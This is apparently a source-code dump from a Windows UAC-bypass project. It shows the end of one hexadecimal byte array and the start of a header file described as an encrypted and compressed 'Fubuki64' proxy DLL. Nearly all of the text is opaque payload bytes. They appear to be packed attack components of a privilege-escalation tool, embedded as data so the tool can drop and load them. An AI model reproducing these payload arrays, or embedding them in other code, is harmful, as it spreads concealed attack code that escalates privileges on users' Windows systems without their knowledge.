159 | 	0x7C, 0xFB, 0x01, 0x0E, 0x47, 0x9D, 0x1C, 0x38, 0x63, 0xF1, 0x52, 0x33, 0x03, 0x1D, 0xAE, 0x19,
160 | 	0x31, 0x3E, 0x47, 0x93, 0x25, 0x8E, 0x99, 0x30, 0x67, 0xEF, 0xDB, 0x33, 0x60, 0x80, 0xC8, 0x3A,
161 | 	0x77, 0xDC, 0xD1, 0xA0, 0x29, 0x8E, 0x1F, 0x26, 0x70, 0xE3, 0xC2, 0xD4, 0x03, 0x05, 0xFA, 0x19,
162 | 	0x61, 0x38, 0xC9, 0x94, 0xC2, 0x48, 0xC2, 0x8D, 0x66, 0xCE, 0xDE, 0x56, 0x13, 0x9D, 0xE9, 0x5B,
163 | 	0x06, 0xE8, 0xA5, 0xD6, 0x37, 0xC7, 0x72, 0x5E, 0x1F, 0xB7, 0xC0, 0x81, 0x30, 0x05, 0x44, 0x7C,
164 | 	0x53, 0x14, 0x8F, 0x93, 0x54, 0x29, 0xFC, 0x33, 0x66, 0x99, 0x98, 0x76, 0x67, 0xB6, 0xED, 0x5B,
165 | 	0x1A, 0x8C, 0x94, 0xCD, 0x31, 0x0E, 0x75, 0x4A, 0x1F, 0x8E, 0xAD, 0xE4, 0x6D, 0x86, 0x19, 0x19,
166 | 	0x40, 0x0D, 0xA7, 0xF4, 0x55, 0x1B, 0x99, 0xC9, 0x66, 0xCF, 0xD6, 0x46, 0x13, 0xBE, 0xE8, 0x4E,
167 | 	0x30, 0xA8, 0xB4, 0xC1, 0x32, 0xE9, 0x4F, 0x4C, 0xF1, 0xEA, 0x97, 0x81, 0x03, 0x06, 0x73, 0x19,
168 | 	0x71, 0x08, 0xA6, 0xE0, 0xA2, 0x29, 0xD1, 0x33, 0x7C, 0xA0, 0xFC, 0x33, 0x48, 0x4C, 0xB8, 0xBA,
169 | 	0x35, 0x84, 0xBD, 0xCC, 0x24, 0x8E, 0x4D, 0xB8, 0x55, 0xE0, 0xA9, 0xF5, 0x53, 0x74, 0x63, 0x7A,
170 | 	0x57, 0x17, 0xF1, 0xE0, 0x26, 0xEE, 0x18, 0x08, 0x62, 0xCA, 0x18, 0x04, 0x67, 0xCE, 0x9D, 0xE1,
171 | 	0x74, 0xAB, 0xA3, 0xC6, 0x26, 0xFA, 0x79, 0x3B, 0x74, 0xEA, 0x40, 0xA4, 0x48, 0x43, 0x5E, 0x57,
172 | 	0x77, 0x28, 0xC9, 0xA0, 0x14, 0x62, 0xFD, 0x5F, 0x0A, 0xCC, 0x99, 0x33, 0xF5, 0xCC, 0xCF, 0x5F,
173 | 	0x13, 0xB9, 0xA4, 0xC6, 0x47, 0xFC, 0x65, 0x6E, 0x11, 0x8C, 0xB5, 0xE4, 0x46, 0x0C, 0x74, 0x99,
174 | 	0x22, 0xE1, 0x48, 0x9A, 0x69, 0x3C, 0xFC, 0x5D, 0x4E, 0x87, 0xFC, 0x4A, 0x66, 0xC6, 0xF5, 0xBB,
175 | 	0x73, 0xAC, 0xB4, 0xB3, 0x2B, 0xEB, 0x68, 0x5D, 0xF0, 0xE8, 0x97, 0x81, 0x57, 0x01, 0x8D, 0x1E,
176 | 	0x30, 0x2C, 0xC9, 0x94, 0x26, 0x0D, 0xDD, 0x65, 0x27, 0xD0, 0xC9, 0x7A, 0xE2, 0xE9, 0x0C, 0x9E,
177 | 	0xED, 0xE1, 0xD3, 0xA3, 0x57, 0x9D, 0x9C, 0x3F, 0xF0, 0x80, 0x40, 0x99, 0xC3, 0x07, 0x34, 0x19,
178 | 	0x32, 0x22, 0x49, 0x13, 0x27, 0xC4, 0x99, 0x32, 0x66, 0xCD, 0xD9, 0x30, 0x37, 0x5B, 0x4D, 0x3F,
179 | 	0x76, 0x28, 0xD4, 0xCB, 0x97, 0x8B, 0x15, 0x3C, 0x7E, 0xE5, 0xE9, 0xC1, 0x09, 0x07, 0x0C, 0xD8,
180 | 	0x37, 0xF4, 0x89, 0x91, 0x86, 0x7C, 0xA1, 0x33, 0x66, 0x0C, 0x98, 0x3C, 0xA7, 0xCC, 0x1C, 0x3A,
181 | 	0x14, 0xDB, 0xC9, 0xA3, 0x47, 0xF3, 0x1D, 0x21, 0xB4, 0xE3, 0x00, 0x83, 0x37, 0x07, 0x4C, 0x1B,
182 | 	0x64, 0x64, 0x9A, 0x93, 0x79, 0x4C, 0xCF, 0x23, 0x66, 0x89, 0x99, 0x61, 0x27, 0xCC, 0xD4, 0x3A,
183 | 	0x3B, 0x3C, 0xD1, 0xED, 0x87, 0x8D, 0x55, 0x78, 0x71, 0xA6, 0x00, 0x83, 0x82, 0x0C, 0xAC, 0xA4,
184 | 	0x36, 0x8B, 0x37, 0x93, 0x66, 0x6B, 0x90, 0x71, 0x4E, 0x57, 0x59, 0x24, 0xA3, 0xCF, 0xA2, 0x3B,
185 | 	0x73, 0x2A, 0xD1, 0xA7, 0x47, 0x06, 0x05, 0x2D, 0x32, 0xE4, 0xE0, 0x81, 0x07, 0x07, 0xCC, 0x0A,
186 | 	0x46, 0x64, 0xBB, 0x93, 0x26, 0x25, 0x99, 0x5D, 0x66, 0xAB, 0x99, 0x75, 0x26, 0x0E, 0x9C, 0x56,
187 | 	0x74, 0x8D, 0xD1, 0xEA, 0x07, 0x8D, 0x7A, 0x2C, 0x70, 0x8F, 0x80, 0x88, 0xFF, 0xC6, 0x2E, 0x18,
188 | 	0x32, 0x54, 0x9D, 0x93, 0x12, 0x8C, 0x99, 0x0A, 0xA4, 0xCD, 0xFB, 0x73, 0x66, 0xCE, 0xB5, 0x3A,
189 | 	0x46, 0xE8, 0x90, 0xB9, 0x04, 0x4E, 0x14, 0x55, 0x70, 0xC8, 0xB0, 0x81, 0x62, 0xC6, 0x07, 0x60,
190 | 	0x72, 0x47, 0xA8, 0x93, 0x20, 0x21, 0xD9, 0x3C, 0x67, 0xDB, 0xCC, 0x33, 0x20, 0xCE, 0xBD, 0x5F,
191 | 	0x34, 0xEC, 0xBE, 0x63, 0x51, 0xFA, 0x1C, 0x78, 0x36, 0xE0, 0xC5, 0xC9, 0x2F, 0x06, 0x1C, 0x59,
192 | 	0x17, 0xA1, 0xD1, 0xD7, 0x66, 0x46, 0xEA, 0x33, 0xC4, 0xAF, 0x5B, 0x2D, 0x17, 0xCE, 0xE9, 0x7A,
193 | 	0x6A, 0x87, 0x91, 0xB2, 0x06, 0x4D, 0x12, 0x79, 0x70, 0xA3, 0xC0, 0xCC, 0xC3, 0x01, 0x2C, 0x5C,
194 | 	0xF2, 0x72, 0xBB, 0x53, 0x3E, 0x34, 0x99, 0x4A, 0x26, 0xDF, 0xDD, 0x67, 0x67, 0x82, 0xDD, 0x3A,
195 | 	0x74, 0x28, 0xCE, 0xAB, 0x8F, 0x9F, 0x4A, 0x29, 0xB0, 0xE9, 0xB2, 0x81, 0x70, 0xCE, 0x03, 0x28,
196 | 	0x32, 0x4A, 0x75, 0x93, 0x1F, 0x8C, 0x99, 0xF2, 0x67, 0x4C, 0xCE, 0x73, 0x65, 0xC9, 0x5D, 0x31,
197 | 	0x21, 0x29, 0xE5, 0xD7, 0x85, 0x84, 0x72, 0xF8, 0x5B, 0x8C, 0x88, 0xAA, 0x45, 0xD6, 0x0C, 0x6C,
198 | 	0x32, 0x06, 0xA9, 0x93, 0x4D, 0x2C, 0x91, 0xD2, 0x69, 0x64, 0xF1, 0x33, 0x45, 0x2E, 0x98, 0x76,
199 | 	0x14, 0xED, 0xB6, 0x81, 0x42, 0x23, 0xBD, 0x24, 0x00, 0xC0, 0xD0, 0x20, 0x27, 0x61, 0x6C, 0x00,
200 | 	0x46, 0xE4, 0xCD, 0xC2, 0x49, 0x4E, 0xB9, 0x33, 0x4E, 0x6C, 0x8F, 0x1A, 0x87, 0xDA, 0xAF, 0x7F,
201 | 	0x54, 0xFC, 0xE0, 0x83, 0x61, 0xAE, 0x1C, 0x15, 0x90, 0xC4, 0xF0, 0xB1, 0x03, 0x37, 0x0C, 0x2C,
202 | 	0x92, 0x66, 0xE6, 0xB1, 0x18, 0x4C, 0x73, 0x38, 0x86, 0xC0, 0xD6, 0x11, 0x47, 0xA9, 0xFD, 0x35,
203 | 	0x97, 0xFA, 0x34, 0x80, 0x40, 0x2F, 0x1D, 0x9B, 0x59, 0x09, 0xD3, 0xAF, 0x03, 0x62, 0x0C, 0x75,
204 | 	0x91, 0x44, 0xC9, 0x72, 0x32, 0x60, 0x99, 0x35, 0x86, 0xCB, 0xC9, 0xD3, 0x60, 0xA4, 0xF2, 0x9A,
205 | 	0x76, 0x9D, 0xB1, 0x8A, 0x33, 0x26, 0x06, 0x18, 0x0B, 0xE0, 0xBD, 0x64, 0x2B, 0x06, 0xAC, 0x08,
206 | 	0x53, 0x42, 0xA2, 0x96, 0x0B, 0x6B, 0x74, 0x15, 0x22, 0xB9, 0x19, 0x3F, 0x66, 0x6E, 0xD3, 0x5B,
207 | 	0x54, 0xE4, 0x74, 0xB1, 0x60, 0xCD, 0x1C, 0xF0, 0x70, 0xC4, 0xC0, 0x01, 0x58, 0x06, 0x58, 0xB9,
208 | 	0x31, 0x85, 0xF6, 0x99, 0x55, 0xEC, 0x8B, 0x52, 0x8C, 0xF4, 0x90, 0x37, 0xD7, 0xCA, 0x9D, 0x06,
209 | 	0x4B, 0x90, 0xBC, 0xCF, 0x67, 0xF8, 0x79, 0x38, 0x02, 0x93, 0xA9, 0xEE, 0x6D, 0x3B, 0x2B, 0x28,
210 | 	0x32, 0x4A, 0xF9, 0xB4, 0x06, 0x29, 0xF7, 0x50, 0x09, 0xCE, 0xFD, 0x33, 0xEB, 0xF3, 0xBA, 0x6F,
211 | 	0x20, 0xAE, 0xFC, 0x83, 0x7F, 0xA9, 0x3C, 0x4B, 0x04, 0xA0, 0x49, 0xE0, 0x6F, 0x06, 0x63, 0x77,
212 | 	0x57, 0x59, 0xEE, 0xEA, 0x43, 0x3F, 0x99, 0x14, 0x59, 0xF2, 0x94, 0x39, 0x5B, 0xAF, 0xEE, 0xBA,
213 | 	0x07, 0x8D, 0xBC, 0xC1, 0x2B, 0xF7, 0x3C, 0x38, 0x78, 0xE0, 0xAE, 0xF2, 0x3E, 0x21, 0x79, 0x6B,
214 | 	0x5C, 0x5E, 0xC9, 0xE0, 0x45, 0x24, 0xFC, 0x5E, 0x07, 0xBF, 0xB4, 0x33, 0x0A, 0xA7, 0xFE, 0x48,
215 | 	0x1B, 0x9B, 0xBE, 0xC5, 0x47, 0xFA, 0x31, 0x5B, 0x1F, 0x8D, 0xFA, 0xE0, 0x70, 0x06, 0x61, 0x37,
216 | 	0x44, 0x55, 0xEE, 0xB3, 0x4B, 0x2D, 0x19, 0x5D, 0x0F, 0xAA, 0xFC, 0x40, 0x13, 0x98, 0x34, 0x37,
217 | 	0x75, 0xA8, 0xD8, 0x83, 0x67, 0xB2, 0x68, 0x4A, 0x05, 0x93, 0x56, 0xF5, 0x62, 0x99, 0xA8, 0x10,
218 | 	0x10, 0xD8, 0xC0, 0xA0, 0x04, 0xAE, 0x9F, 0x32, 0x46, 0xCB, 0xEA, 0x56, 0x04, 0xBB, 0xEF, 0x53,
219 | 	0x00, 0x6E, 0xA8, 0x47, 0x46, 0xAE, 0x1E, 0x4A, 0x15, 0x91, 0xB5, 0x21, 0x0F, 0x06, 0x69, 0x7D,
220 | 	0x62, 0x16, 0xA0, 0xE5, 0x4F, 0x20, 0xA9, 0x56, 0x01, 0xA9, 0xEA, 0xB5, 0x64, 0x07, 0x9E, 0x7F,
221 | 	0x0C, 0xED, 0x91, 0xA4, 0x33, 0x4E, 0x02, 0x74, 0x15, 0x96, 0xA5, 0xED, 0x07, 0x26, 0x60, 0xB8,
222 | 	0x32, 0x59, 0xEE, 0xF2, 0x55, 0x05, 0x99, 0x5D, 0x10, 0xA3, 0xF2, 0x56, 0x15, 0xE9, 0xBD, 0x2A,
223 | 	0x01, 0x81, 0x90, 0xC0, 0x46, 0x2B, 0x21, 0x1F, 0x16, 0x60, 0xA1, 0xED, 0x70, 0x63, 0x2B, 0x39,
224 | 	0x1D, 0xE3, 0xC5, 0x01, 0x09, 0xFB, 0x95, 0x0F, 0x49, 0xA6, 0x8B, 0x0F, 0x48, 0x48, 0x86, 0xC3,
225 | 	0xB4, 0xEF, 0xED, 0x8C, 0xA2, 0xA8, 0x9C, 0x39, 0xF1, 0xA4, 0xBF, 0x81, 0x3C, 0x02, 0xF3, 0x26,
226 | 	0x36, 0x5B, 0xCD, 0xAC, 0x22, 0x73, 0x9D, 0x0C, 0x62, 0xF3, 0x9D, 0x1E, 0x63, 0xCE, 0xC2, 0x38,
227 | 	0x34, 0xD8, 0xD0, 0xB4, 0x77, 0xA4, 0x2C, 0x79, 0x40, 0xE0, 0x8D, 0xB1, 0x64, 0x36, 0x62, 0x29,
228 | 	0xB6, 0x54, 0xC9, 0x00, 0x16, 0xD4, 0xA9, 0xF9, 0x56, 0x2E, 0xA9, 0x33, 0x96, 0xFE, 0x9C, 0x0B,
229 | 	0x7C, 0xD9, 0xC0, 0x92, 0x47, 0x94, 0x2D, 0x1D, 0x41, 0xD4, 0xF1, 0xDD, 0x32, 0x06, 0x6E, 0x28,
230 | 	0x92, 0x55, 0x08, 0xA2, 0xE1, 0x7D, 0x99, 0x0E, 0x54, 0xB5, 0xAB, 0xB4, 0x55, 0x58, 0xAF, 0xC5,
231 | 	0xB9, 0xEC, 0x2E, 0xA3, 0x58, 0x8F, 0x03, 0x39, 0x6F, 0xE1, 0xDF, 0x80, 0x1C, 0x07, 0x13, 0x18,
232 | 	0xCD, 0x7B, 0xC8, 0x8C, 0x27, 0x53, 0x98, 0x2C, 0x67, 0xD3, 0x98, 0x2C, 0x66, 0xD1, 0x9C, 0x25,
233 | 	0x75, 0x17, 0xCE, 0xA2, 0x58, 0x8F, 0x03, 0x39, 0x6F, 0xE1, 0xDF, 0x80, 0x1C, 0x07, 0x13, 0x18,
234 | 	0x2D, 0x65, 0xC8, 0x8C, 0x27, 0x4C, 0x99
235 | };
236 | 


--------------------------------------------------------------------------------
/BypassUAC/fubuki64comp.h:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
  4 | *
  5 | *  TITLE:       FUBUKI64COMP.H
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        14 Nov 2015
 10 | *
 11 | *  Encrypted and compressed Fubuki64 proxy dll.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #pragma once
 20 | 
 21 | static const unsigned char Fubuki64Comp[3596] = {
 22 | 	0x32, 0x78, 0xC9, 0x93, 0x89, 0xF4, 0x99, 0x7E, 0x3C, 0x5C, 0x99, 0x30, 0x67, 0xCE, 0x9D, 0xB8,
 23 | 	0x70, 0xE8, 0xE1, 0x5C, 0xB8, 0x8E, 0x1C, 0x80, 0x70, 0xD8, 0xED, 0x80, 0x13, 0x46, 0x08, 0x21,
 24 | 	0x2B, 0x54, 0x29, 0x93, 0x56, 0x42, 0x86, 0x33, 0xDC, 0xC2, 0x99, 0x87, 0x6E, 0x03, 0xBC, 0x82,
 25 | 	0x74, 0xE9, 0x9D, 0x6E, 0x66, 0xDA, 0x74, 0x51, 0x03, 0xE0, 0xE0, 0xF1, 0x71, 0x69, 0x6B, 0x6B,
 26 | 	0x53, 0x09, 0xC9, 0xB3, 0x45, 0x2D, 0xF7, 0x5D, 0x09, 0xB8, 0xB9, 0x33, 0x05, 0xAB, 0xBD, 0x48,
 27 | 	0x01, 0x86, 0xF1, 0xCA, 0x47, 0xE0, 0x3C, 0x7C, 0x3F, 0xB3, 0xE0, 0xEC, 0x6C, 0x86, 0x68, 0x7C,
 28 | 	0x1C, 0x69, 0xC4, 0x99, 0x02, 0x48, 0x29, 0x33, 0x85, 0xED, 0x98, 0x8A, 0xC0, 0x8E, 0xF2, 0xD0,
 29 | 	0x35, 0xED, 0xD2, 0xD9, 0xF8, 0x2A, 0xF6, 0x9A, 0x72, 0xEF, 0xAE, 0x85, 0xE9, 0xAC, 0x0C, 0x1E,
 30 | 	0xEE, 0x7F, 0xAE, 0x78, 0x8B, 0xDD, 0x9B, 0x34, 0x09, 0x27, 0x3F, 0x31, 0x60, 0x5E, 0x77, 0x3B,
 31 | 	0x73, 0x60, 0x76, 0xE3, 0xBF, 0x8C, 0x1B, 0xE4, 0x6B, 0x8D, 0xC2, 0x96, 0x73, 0x54, 0x65, 0x7A,
 32 | 	0x5A, 0x65, 0x8A, 0x97, 0x70, 0x4A, 0x9F, 0x63, 0x66, 0x89, 0x99, 0x33, 0x03, 0x48, 0x99, 0x3A,
 33 | 	0xDB, 0xE0, 0x3B, 0x9D, 0x11, 0x8B, 0x08, 0xC8, 0x70, 0xC2, 0xE0, 0xA9, 0x08, 0x04, 0x02, 0x1A,
 34 | 	0xC6, 0x70, 0x4A, 0x99, 0x9A, 0x5D, 0xFC, 0xB3, 0x65, 0xDC, 0x1B, 0x36, 0xE7, 0xCF, 0x9C, 0x39,
 35 | 	0xF5, 0xED, 0xD3, 0x9B, 0x47, 0x8E, 0x1A, 0xB8, 0x75, 0x65, 0xC1, 0x80, 0x08, 0x06, 0x5C, 0x1A,
 36 | 	0xB2, 0x66, 0xC9, 0x05, 0x9E, 0x45, 0x98, 0x33, 0x64, 0xCC, 0x4F, 0x53, 0x67, 0xDB, 0x9E, 0x20,
 37 | 	0x74, 0xEC, 0xD2, 0xA3, 0x42, 0x8A, 0x9A, 0x3F, 0x31, 0x63, 0xC8, 0x61, 0x21, 0x06, 0x0C, 0x37,
 38 | 	0x32, 0x40, 0xD9, 0x23, 0x0F, 0x4C, 0x99, 0x0F, 0x67, 0xE8, 0x99, 0x83, 0x87, 0xCF, 0x27, 0x0A,
 39 | 	0x44, 0xE8, 0xD1, 0xBB, 0xC6, 0x89, 0xA1, 0x39, 0x50, 0xE0, 0xC4, 0x81, 0x7B, 0x9E, 0x2D, 0x37,
 40 | 	0x46, 0x01, 0xB1, 0xE7, 0xDB, 0xCC, 0x96, 0x7B, 0x67, 0x3A, 0x18, 0x7E, 0xE6, 0xF3, 0x1C, 0x3B,
 41 | 	0xBC, 0xE4, 0x51, 0xB3, 0x47, 0xEE, 0x32, 0x4A, 0x14, 0x81, 0xB4, 0xE0, 0x03, 0x9E, 0x0C, 0xDB,
 42 | 	0x38, 0x64, 0xCF, 0x93, 0x22, 0x4C, 0x95, 0xF3, 0x67, 0x42, 0x91, 0xF3, 0x67, 0x46, 0x9D, 0xBA,
 43 | 	0x5A, 0xA8, 0xFF, 0xD3, 0x84, 0x87, 0xFB, 0xFA, 0x5E, 0x20, 0xF0, 0x81, 0x40, 0x06, 0x0C, 0xDD,
 44 | 	0x60, 0xE1, 0xC3, 0x51, 0x2F, 0xBC, 0xEB, 0x40, 0x14, 0xAF, 0x99, 0x37, 0xA5, 0xF4, 0x9D, 0x3E,
 45 | 	0x76, 0xBC, 0x2F, 0xB5, 0x02, 0x86, 0xDF, 0x39, 0xB1, 0xE9, 0x8B, 0x85, 0x7C, 0x05, 0x73, 0x09,
 46 | 	0x4D, 0x74, 0xCE, 0xEC, 0x36, 0x33, 0x89, 0x6E, 0x76, 0x0E, 0x99, 0x33, 0xAB, 0x86, 0x9D, 0xB3,
 47 | 	0x28, 0xCC, 0xC9, 0xF6, 0x11, 0xD9, 0x54, 0xB8, 0xFD, 0x8C, 0xE4, 0x38, 0x4B, 0x87, 0xE0, 0xF8,
 48 | 	0x48, 0x64, 0xFA, 0x65, 0x6E, 0xC1, 0xDC, 0x5C, 0x2E, 0xED, 0xD9, 0x46, 0x08, 0x86, 0x10, 0x2F,
 49 | 	0x23, 0xE8, 0x97, 0x82, 0x67, 0xFB, 0x7B, 0x79, 0xC9, 0xF9, 0x00, 0xBD, 0x46, 0x35, 0x0C, 0xD9,
 50 | 	0x7A, 0xED, 0x8D, 0xB7, 0x06, 0x04, 0x5E, 0x33, 0xA7, 0xCD, 0x99, 0x33, 0xE7, 0x31, 0x88, 0xFB,
 51 | 	0x74, 0xE7, 0xD1, 0xA3, 0xC2, 0x4E, 0x13, 0xBD, 0x38, 0xE1, 0x00, 0x80, 0x4B, 0x8D, 0x41, 0x76,
 52 | 	0x7A, 0xE1, 0x00, 0x9B, 0x29, 0xC8, 0xD3, 0xB2, 0x67, 0x41, 0xDC, 0x54, 0x22, 0x9A, 0xAE, 0xF3,
 53 | 	0xD5, 0xED, 0xF9, 0x03, 0x4F, 0xBF, 0xBC, 0x30, 0x38, 0xF0, 0xE1, 0xF5, 0x27, 0x26, 0x2C, 0x11,
 54 | 	0xCD, 0x71, 0x5A, 0x96, 0x82, 0x4A, 0x8B, 0x33, 0x63, 0x47, 0xE4, 0x54, 0x98, 0x09, 0x95, 0xC5,
 55 | 	0x61, 0x38, 0x91, 0xA1, 0x03, 0x05, 0xDB, 0xB5, 0x70, 0xB6, 0xC8, 0xC9, 0x88, 0xCE, 0xF3, 0x0C,
 56 | 	0xBB, 0x45, 0x09, 0x92, 0x6E, 0xC7, 0x41, 0x7B, 0x06, 0xC7, 0x1D, 0xDF, 0x08, 0x2E, 0x85, 0x58,
 57 | 	0x7F, 0xA8, 0xDB, 0x46, 0x4E, 0x6F, 0xFC, 0x3B, 0xB2, 0xEB, 0x9C, 0xAC, 0x47, 0x0C, 0x4C, 0x19,
 58 | 	0x30, 0x65, 0xD8, 0x1B, 0xA7, 0x49, 0x14, 0x3E, 0x44, 0x15, 0x59, 0x32, 0x98, 0xDB, 0xFE, 0x9A,
 59 | 	0x74, 0xA0, 0x5A, 0xB3, 0x8C, 0x71, 0x09, 0x62, 0x70, 0xE1, 0x4D, 0xD7, 0x6B, 0x06, 0x3F, 0xD9,
 60 | 	0xB9, 0xAE, 0x81, 0x1E, 0x5B, 0x9B, 0x9D, 0xC0, 0xCC, 0x6C, 0x99, 0x84, 0xEE, 0x9B, 0x4A, 0xB7,
 61 | 	0x70, 0xA6, 0xC9, 0xC2, 0x46, 0xC3, 0xCB, 0xC7, 0x65, 0xB7, 0x91, 0xE0, 0x06, 0x8B, 0x49, 0xAE,
 62 | 	0xB6, 0x72, 0x81, 0xD2, 0x3B, 0xC1, 0x39, 0x76, 0xB1, 0x84, 0x12, 0xE0, 0x06, 0xC0, 0xDD, 0x7A,
 63 | 	0x6D, 0xBD, 0x11, 0xB4, 0x7F, 0xEF, 0x04, 0x08, 0x70, 0xE1, 0xE8, 0xE1, 0x03, 0x26, 0x04, 0xE6,
 64 | 	0x27, 0x9E, 0xC9, 0x1A, 0xAD, 0xBC, 0x1C, 0xF3, 0xE2, 0xB8, 0x8D, 0x33, 0x73, 0x79, 0x62, 0x2F,
 65 | 	0x96, 0x08, 0xD0, 0xC2, 0x67, 0x8F, 0xA3, 0xC7, 0x65, 0x38, 0xE0, 0x80, 0xE0, 0x05, 0x40, 0x49,
 66 | 	0xB9, 0xA7, 0xFA, 0x41, 0xA4, 0x56, 0x7D, 0x90, 0x65, 0xA3, 0x91, 0xCC, 0x72, 0x54, 0xBC, 0x3B,
 67 | 	0xF7, 0x8D, 0xBE, 0xA3, 0x2A, 0xCE, 0x3F, 0xCE, 0x11, 0xE1, 0x25, 0xA8, 0x6A, 0x87, 0x0D, 0xFA,
 68 | 	0x1A, 0x10, 0xD9, 0x95, 0xD9, 0x59, 0xEB, 0xF3, 0x67, 0x47, 0x5F, 0x7B, 0xF7, 0x45, 0x01, 0x1E,
 69 | 	0x64, 0x89, 0xFB, 0x22, 0x83, 0x4F, 0x2F, 0x28, 0x2F, 0xBE, 0x9D, 0x42, 0xE1, 0x30, 0x04, 0x51,
 70 | 	0xBB, 0x64, 0xB5, 0xB7, 0x36, 0x19, 0xD1, 0xBE, 0xCA, 0xE8, 0x09, 0x33, 0x9D, 0x31, 0x62, 0x9A,
 71 | 	0x43, 0xE8, 0xD6, 0x03, 0xFF, 0x0F, 0x3C, 0x3D, 0x70, 0xDB, 0x10, 0x8E, 0x86, 0x56, 0x4D, 0x1F,
 72 | 	0x76, 0xE9, 0xC4, 0x72, 0x2D, 0xB3, 0x8C, 0x6B, 0x46, 0xC5, 0x71, 0x73, 0x68, 0x30, 0x62, 0xC5,
 73 | 	0x47, 0x33, 0x10, 0x87, 0x6C, 0x9F, 0x7C, 0x3B, 0xFD, 0xB3, 0xA8, 0x40, 0x22, 0x7A, 0x28, 0x69,
 74 | 	0x33, 0x05, 0xE9, 0xEF, 0x02, 0x1C, 0x10, 0x67, 0x42, 0xBC, 0x9D, 0xBE, 0x2C, 0xEC, 0xBF, 0x76,
 75 | 	0x50, 0x98, 0x2E, 0xB6, 0x41, 0xCA, 0x7C, 0x3E, 0x70, 0xDE, 0x4D, 0xFC, 0xE3, 0xBF, 0x06, 0x38,
 76 | 	0xF2, 0xC5, 0x81, 0x1E, 0x73, 0xAC, 0xB8, 0x36, 0x6B, 0x30, 0x88, 0xD3, 0x65, 0x8F, 0x25, 0x3E,
 77 | 	0x34, 0xE0, 0x2E, 0xB6, 0x4F, 0xAF, 0x7C, 0x39, 0x8F, 0x28, 0xFD, 0x83, 0x83, 0x07, 0x03, 0x9E,
 78 | 	0x14, 0xB1, 0x49, 0xBC, 0x27, 0x4A, 0x24, 0xC3, 0xA6, 0xCD, 0x20, 0x23, 0x66, 0x8E, 0x11, 0xC9,
 79 | 	0xDE, 0xE7, 0x66, 0xEE, 0xA7, 0xC6, 0x18, 0xB5, 0xF5, 0xC1, 0xC2, 0xE7, 0x86, 0xCF, 0x78, 0x07,
 80 | 	0x3B, 0xC5, 0xC1, 0xDB, 0xAB, 0x6E, 0x9D, 0x7B, 0x4D, 0x1B, 0xFF, 0x33, 0xEE, 0xC6, 0xD5, 0xB9,
 81 | 	0xB4, 0xEA, 0xDE, 0x14, 0x43, 0x82, 0x1E, 0x98, 0x73, 0x95, 0x30, 0xE7, 0x8A, 0x1E, 0x45, 0x9C,
 82 | 	0x37, 0x5D, 0x54, 0xF2, 0x20, 0x38, 0x90, 0xD2, 0x65, 0xAA, 0x99, 0x0A, 0x7F, 0xBB, 0x6A, 0x72,
 83 | 	0xF9, 0xE5, 0x63, 0xA6, 0xE7, 0x83, 0xA6, 0x79, 0xFA, 0xA8, 0xEB, 0x49, 0x65, 0x8F, 0x1C, 0x09,
 84 | 	0x7A, 0xE9, 0x89, 0xD3, 0x21, 0x58, 0x98, 0x55, 0x72, 0x49, 0x4B, 0x77, 0x60, 0x43, 0xFC, 0x3C,
 85 | 	0x3C, 0x65, 0x95, 0x67, 0x63, 0xDE, 0xF6, 0x00, 0x34, 0xC4, 0xB0, 0xE1, 0x33, 0x26, 0x5B, 0xB3,
 86 | 	0x72, 0x44, 0x92, 0x73, 0x27, 0x76, 0xA1, 0x32, 0x39, 0xFC, 0x19, 0x6C, 0x41, 0xE6, 0xFD, 0x3A,
 87 | 	0x54, 0xD1, 0xE1, 0xAE, 0x46, 0xD7, 0x68, 0x2E, 0x70, 0xA8, 0x4B, 0xCD, 0x27, 0x56, 0xF3, 0x0C,
 88 | 	0x2B, 0x27, 0x09, 0x92, 0x67, 0x4D, 0xC1, 0xCC, 0x73, 0xC2, 0xD9, 0x32, 0x54, 0xDE, 0x54, 0xC5,
 89 | 	0x61, 0x16, 0x71, 0x02, 0x8B, 0xC2, 0x91, 0x3C, 0xEC, 0xC4, 0x41, 0xAD, 0x4A, 0x8D, 0x57, 0x09,
 90 | 	0x7B, 0x64, 0x42, 0xE8, 0x3E, 0x05, 0x12, 0xD0, 0x3B, 0x0F, 0xE6, 0x93, 0x79, 0x91, 0x9D, 0x05,
 91 | 	0x70, 0xD7, 0xD5, 0x9C, 0x43, 0xB1, 0x18, 0x10, 0x74, 0x76, 0x6A, 0xAB, 0xC0, 0x06, 0x8A, 0x6D,
 92 | 	0x32, 0x16, 0xBD, 0x93, 0x80, 0x38, 0x99, 0x66, 0xC3, 0xCE, 0xBF, 0xC7, 0x67, 0xFC, 0xE9, 0x3A,
 93 | 	0x6C, 0x9C, 0xD1, 0xF1, 0xF2, 0xFA, 0x1C, 0x3A, 0x04, 0xE0, 0x26, 0x71, 0x6E, 0x37, 0x0F, 0xC3,
 94 | 	0x46, 0x64, 0xF3, 0xD3, 0x52, 0x4D, 0x51, 0xC7, 0x66, 0x39, 0x9D, 0x46, 0x67, 0x9D, 0x9D, 0x3A,
 95 | 	0x1B, 0xE8, 0xB7, 0xA3, 0x33, 0x8E, 0x6B, 0x38, 0x70, 0x81, 0xC0, 0xF3, 0x03, 0x63, 0x0C, 0x45,
 96 | 	0x32, 0xEC, 0x88, 0x93, 0x4D, 0xFC, 0x99, 0x54, 0x66, 0xA5, 0xBB, 0x31, 0xCD, 0x82, 0x6D, 0x3B,
 97 | 	0x02, 0x98, 0xD0, 0xEF, 0x77, 0x8E, 0x68, 0x48, 0x72, 0x6E, 0xA5, 0xD1, 0x01, 0x87, 0x0D, 0x4E,
 98 | 	0x30, 0x44, 0xC9, 0xFF, 0x9E, 0x4D, 0x9B, 0x13, 0xB6, 0xC8, 0xF6, 0x33, 0x12, 0xCE, 0xF3, 0x3A,
 99 | 	0xFE, 0x8C, 0x23, 0xA0, 0x12, 0x7E, 0x18, 0x7B, 0x70, 0xAD, 0xD0, 0x83, 0xA1, 0x26, 0x1C, 0x1C,
